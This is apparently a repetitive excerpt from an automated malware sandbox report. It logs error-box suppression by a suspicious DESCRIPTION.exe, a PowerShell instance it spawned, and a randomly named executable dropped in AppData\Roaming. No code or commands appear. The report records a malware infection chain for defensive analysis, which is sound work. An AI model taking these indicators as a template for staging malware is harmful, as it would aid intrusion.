Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process information set: NOOPENFILEERRORBOX
